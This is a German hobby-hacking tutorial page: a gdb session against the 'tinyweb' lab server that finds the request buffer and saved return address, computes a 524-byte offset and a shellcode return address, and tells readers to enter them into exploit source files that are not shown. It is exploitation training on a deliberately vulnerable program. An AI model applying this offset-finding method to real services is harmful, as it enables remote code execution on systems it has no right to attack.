Tipp: request ist der Anfang vom Spielraum und Saved eip ist das Ende eueres Spielraums


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinyweb
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinyweb
root      2818  0.0  0.0   2048   284 tty2     S+   19:21   0:00 ./tinyweb
root      2824  0.0  0.0   5924   840 pts/1    S+   19:21   0:00 grep --color=auto tinyweb
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinyweb_exploit
Usage: ./tinyweb_exploit <hostname>
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q --pid=2818 --symbols=./tinyweb
Reading symbols from /home/tomovic/Dokumente/hack/tinyweb...done.
Attaching to process 2818
Load new symbol table from "/home/tomovic/Dokumente/hack/tinyweb"? (y or n) n
Nicht bestätigt.
(gdb) bt
#0  0xb7fdd424 in ?? ()
#1  0xb7e2f935 in ?? ()
(gdb) list
...Quellcode...
44       new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
...Quellcode...
(gdb) break 62
Haltepunkt 1 at 0x8048d23: file tinyweb.c, line 62.
(gdb) c
Continuing.

Breakpoint 2, handle_connection (sockfd=4, client_addr_ptr=0xbffff6f4) at tinyweb.c:62
62    length = recv_line(sockfd, request);
(gdb) x/x request
0xbffff4c0: 0x00000007
(gdb) bt
#0  handle_connection (sockfd=4, client_addr_ptr=0xbffff6f4) at tinyweb.c:62
#1  0x08048d16 in main () at tinyweb.c:48

(gdb) x/x request
0xbffff4c0: 0x00000007

(gdb) x/16xw request+500
0xbffff6b4: 0xb7ff2990 0xb7fc5000 0xbffff728 0xb7fc5000
0xbffff6c4: 0x00000000 0xbffff728 0x08048d16 0x00000004
0xbffff6d4: 0xbffff6f4 0xbffff6f0 0xbffff714 0x00000004
0xbffff6e4: 0x08048840 0x00000000 0x08048631 0x00000010

 

Wenn ihr es genau wissen wollt, sucht nach  0x08048d16, deren Adresse !!!

(gdb) x/30x request
0xbffff4c0: 0x00000007 0xb7fff000 0xb7e1979c 0x00000001
0xbffff4d0: 0xb7fdcb18 0xb7fe778c 0x00000001 0x00000001
0xbffff4e0: 0x00000000 0x00000011 0x00000088 0xb7ff3b53
0xbffff4f0: 0x00000008 0x00000003 0xb7fdcdc8 0xf15ae9b5
0xbffff500: 0x000003f3 0xb7ff7be6 0x078ad74d 0xb7e21768
0xbffff510: 0xb7e19eb8 0xb7fff55c 0xb7fde494 0xb7fdcb18
0xbffff520: 0xb7fde2d4 0xb7fde612 0xb7fde2d4 0x00000000
0xbffff530: 0x00000000 0x00000000
(gdb)
0xbffff538: 0x00000001 0x0000078b 0xb7fdcb48 0xb7fdc858
0xbffff548: 0x0804848a 0xb7e233d8 0x0804825c 0x00000001
0xbffff558: 0x00000000 0x00000040 0xb7fde714 0xb7fff000
0xbffff568: 0xbffff694 0xb7fffaf0 0xbffff650 0xb7fe79b2
0xbffff578: 0xbffff5f8 0x0804825c 0xbffff600 0xb7fffa94
0xbffff588: 0x00000000 0xb7fdcb48 0x00000001 0x00000000
0xbffff598: 0x00000001 0xb7fff938 0xb7fdcb18 0xb7fe778c
0xbffff5a8: 0x000fffff 0xb7fff000
(gdb)
0xbffff5b0: 0xb7fff55c 0xb7ff3186 0xb7fff000 0xb7fe1454
0xbffff5c0: 0xb7fff55c 0x00000003 0x00000000 0xf63d4e2e
0xbffff5d0: 0x000003f3 0x00000000 0xbffff694 0xb7fff938
0xbffff5e0: 0xb7e19eb8 0x00000000 0x00000000 0x00000000
0xbffff5f0: 0x0804848a 0x00000000 0xffffffff 0x00000000
0xbffff600: 0xb7e21768 0xb7fdc858 0x00000001 0x000008ce
0xbffff610: 0xb7fdcb48 0xb7fdc858 0x08048491 0xb7e233d8
0xbffff620: 0x080482ec 0x00000001
(gdb)
0xbffff628: 0xb7fff900 0x00000000 0x2cb43078 0xb7fff000
0xbffff638: 0xbffff764 0xb7fffaf0 0xbffff720 0xb7fff000
0xbffff648: 0xb7fff938 0x00000001 0x0804b02c 0xb7fec5ec
0xbffff658: 0xb7fffaf0 0xb7fdcb48 0x00000001 0x00000001
0xbffff668: 0x00000000 0xb7fff938 0x00000000 0x00000000
0xbffff678: 0x00000078 0x00000000 0x00000000 0x080483cc
0xbffff688: 0x00000000 0x30385000 0xbffff6de 0xb7e21768
0xbffff698: 0xb7e5a8f1 0xb7fc5000
(gdb)
0xbffff6a0: 0x00000000 0xb7fc5000 0x00000000 0x00000000
0xbffff6b0: 0xbffff728 0xb7ff2990 0xb7fc5000 0xbffff728
0xbffff6c0: 0xb7fc5000 0x00000000 0xbffff728 0x08048d16 <--- Rückspungadresse !!!
0xbffff6d0: 0x00000004 0xbffff6f4 0xbffff6f0 0xbffff714
0xbffff6e0: 0x00000004 0x08048840 0x00000000 0x08048631
0xbffff6f0: 0x00000010 0xe88e0002 0x0100007f 0x00000000
0xbffff700: 0x00000000 0x50000002 0x00000000 0x00000000
0xbffff710: 0x00000000 0x00000001

Die Umkehrkontrolle:

(gdb) info frame
Stack level 0, frame at 0xbffff6d0:
 eip = 0x8048d23 in handle_connection (tinyweb.c:62); saved eip 0x8048d16 
 called by frame at 0xbffff730
 source language c.
 Arglist at 0xbffff6c8, args: sockfd=4, client_addr_ptr=0xbffff6f4
 Locals at 0xbffff6c8, Previous frame's sp is 0xbffff6d0
 Saved registers:
  ebx at 0xbffff6c0, ebp at 0xbffff6c8, edi at 0xbffff6c4, eip at 0xbffff6ccCouldn't read extended state status: Kein passendes Gerät gefunden.

(gdb) x/x request
0xbffff4c0: 0x00000007
(gdb) x/16xw request+480
0xbffff6a0: 0x00000000 0xb7fc5000 0x00000000 0x00000000
0xbffff6b0: 0xbffff728 0xb7ff2990 0xb7fc5000 0xbffff728
0xbffff6c0: 0xb7fc5000 0x00000000 0xbffff728 0x08048d16 <--- hier ist der eip !!!
0xbffff6d0: 0x00000004 0xbffff6f4 0xbffff6f0 0xbffff714

(gdb) x/x 0xbffff6cc ...der Test
0xbffff6cc: 0x08048d16 ...ok das ist der saved eip (Rücksprungadresse)
(gdb) p 0xbffff6cc - 0xbffff4c0 ..ist die Adresse von saved eip ...ist die Adresse von request
$1 = 524
(gdb) p /x 0xbffff4c0 + 200  ...200 ist reserviert für den Shellcode
$2 = 0xbffff588
(gdb) quit
A debugging session is active.

 Inferior 1 [process 3088] will be detached.

Quit anyway? (y or n) y
Detaching from program: /home/tomovic/Dokumente/hack/tinyweb, process 3088
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#


Ganz wichtig :


$1 ist der Buffer
$2 ist die Offestadresse

öffnet die tinyweb_exploit.c und  tinyweb_exploit2.c, dann trägt ihr die Werte ein.
Denkt daran, wenn ihr das OS wechselt, habt ihr andere Werte !!!
Die nächsten Beispiele sollten ohne Probleme gehen. Ich will euch nicht alles vorkauen :-) Tipps bekommt ihr per Email.

 


 

   

Metasploit  

   
© ALLROUNDER